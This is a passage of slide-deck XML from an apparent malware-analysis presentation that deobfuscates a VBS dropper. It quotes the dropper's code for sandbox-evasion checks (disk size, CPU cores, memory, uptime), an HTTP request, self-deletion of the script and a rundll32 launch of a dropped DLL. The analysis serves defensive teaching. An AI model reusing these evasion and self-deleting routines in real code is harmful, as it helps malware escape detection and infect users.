          <p:cNvPr id="351" name="Google Shape;351;p59"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4076750" y="1635038"/>
            <a:ext cx="4610100" cy="1514475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="352" name="Google Shape;352;p59"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2801700"/>
            <a:ext cx="4629150" cy="1333500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="353" name="Google Shape;353;p59"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4076750" y="3216325"/>
            <a:ext cx="4686300" cy="13525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357" name="Shape 357"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="358" name="Google Shape;358;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else does this VBS do?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="359" name="Google Shape;359;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rPr>
              <a:t>So far we have only looked at 1 out of 17 obfuscated blocks of code.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>They could be functions, could be other stuff.</a:t>
            </a:r>
            <a:endParaRPr sz="1600">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For example:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execute(limpet(fAsKosm))</a:t>
            </a:r>
            <a:endParaRPr sz="1600">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Which starts like this:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fAsKosm=Array(77,124,117,106,123,112,118,117,39,76,83,125,125,47,48,17,78,...</a:t>
            </a:r>
            <a:endParaRPr sz="1600">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363" name="Shape 363"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="364" name="Google Shape;364;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fAsKosm - Check size of the hard drive</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="365" name="Google Shape;365;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Set judiciouslItems = setupService.ExecQuery("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Select * from Win32_LogicalDisk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a: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For Each inhwg In judiciouslItems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Ppli = Ppli + Int(inhwg.Size / (39 + ((22 + (-17.0)) + (1073741782 - 2.0))))</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myDiskSizeGB = myDiskSize + Int(myDisk.Size / 1073741824</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Next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If round(Ppli) &lt; (((7 + 27.0) + (-19.0)) + (6208 - 6173.0)) Then</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>If round(myDiskSizeGB) &lt; 50</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>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GewqX("DEBUG: FS_FCH - False")</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Ldj</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>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VirusTotal knows the hash</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Google Shape;79;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1098900"/>
            <a:ext cx="8175900" cy="2064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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The first time I generated the file, it resulted in sha256 hash:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>77E706F98B1E4FE48A4A1631B27529DC587AEAB2D187322439D3B5A726DA2F80</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100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80" name="Google Shape;80;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2207400"/>
            <a:ext cx="6129300" cy="2369908"/>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369" name="Shape 369"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="370" name="Google Shape;370;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sidebar #6 - wtf is Ldj?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="371" name="Google Shape;371;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Function Ldj()</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If (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EA9999"/>
                </a:highlight>
              </a:rPr>
              <a:t>InStr(WScript.ScriptName, cStr(82984))</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &gt; 0 And ucMHV = 0) Then</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MsgBox("DEBUG: SANDBOX PUSH")</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Else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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>DlAMe("-")</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>nimbus</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>WScript.Quit</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="00FF00"/>
              </a:highlight>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End If</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>End Function</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk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375" name="Shape 375"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="Google Shape;376;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Sidebar #6 - wtf is DlAMe()? - Sends an HTTP GET</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="377" name="Google Shape;377;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Function DlAMe(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>vertebrate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a: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on error resume next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Dim thrombosis: Set thrombosis = CreateObject("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>MSXML2.ServerXMLHTTP.6.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a: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thrombosis.setOption(2) = ((44 + 13108.0) - (988 - (4853 - 3961.0)))</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thrombosis.Open "GET", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>vertebrate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, False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thrombosis.setRequestHeader "User-Agent", "Mozilla/4.0"</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thrombosis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>.Send</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>End Function</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk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381" name="Shape 381"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="382" name="Google Shape;382;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wtf is nimbus? - Deletes the VBS file (destroy evidence)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="383" name="Google Shape;383;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Function nimbus()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Dim awry: Set awry = WScript.CreateObject("Scripting.FileSystemObject")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awry.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>DeleteFile WScript.ScriptFullName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, True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End Function</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387" name="Shape 387"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="388" name="Google Shape;388;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sidebar #6 - Ldj Conclusions - cleanup and exit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389" name="Google Shape;389;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Else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DlAMe("-")   	⇐ Sends an HTTP GET (to nowhere)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nimbus 		⇐ Deletes the VBS file</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    	WScript.Quit	⇐ Ends the script</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a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Circling back to fAsKosm:  If the disk size is less than 50 GB, cleanup and exit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If round(myDiskSizeGB) &lt; 50</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GewqX("DEBUG: FS_FCH - False")</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    	Ldj</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk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393" name="Shape 393"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="394" name="Google Shape;394;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sidebar #6 - One more thing…</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="395" name="Google Shape;395;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396" name="Google Shape;396;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1581075" y="1017725"/>
            <a:ext cx="5581650" cy="38862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400" name="Shape 400"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="401" name="Google Shape;401;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 the rest of the obfuscated code blocks do?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="402" name="Google Shape;402;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execute(limpet(yEE)):    	 REM QSV() - FS_FCC - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>checks number of cores (&lt; 3)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>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execute(limpet(rgmzwbIle)):    REM Zme() - FS_CM - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>checks physical memory (&lt; 1030 MB)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>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execute(limpet(GVRjBk)):    REM Ldj() - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>http.send, delete VBS, end the script</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>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highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>execute(limpet(HUYcmaiVH)):    REM numb() - FS_PROCESS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t> if running this other process, quit</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>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highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>execute(limpet(zwGzBJ)):    REM ERa() - F_RUN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>"rundll32" + " " + sandhill + "racial.drc,DllRegisterServer"</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>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execute(limpet(VImQhn)):    REM hydrothermal() - F_UNZIP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execute(limpet(ApqG)):   	 REM TdJb() - FS_CLB - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>checks LastBootUpTime</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execute(limpet(HHSutZ)):    REM RGOD() - FS_TD1 -</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highligh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406" name="Shape 406"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="407" name="Google Shape;407;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obfuscated code blocks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="408" name="Google Shape;408;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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execute(limpet(anyaxMfVI)):    REM nimbus() - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>delete the VBS script</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execute(limpet(WRY)):   	 REM sandhill() - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>return %TEMP%</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
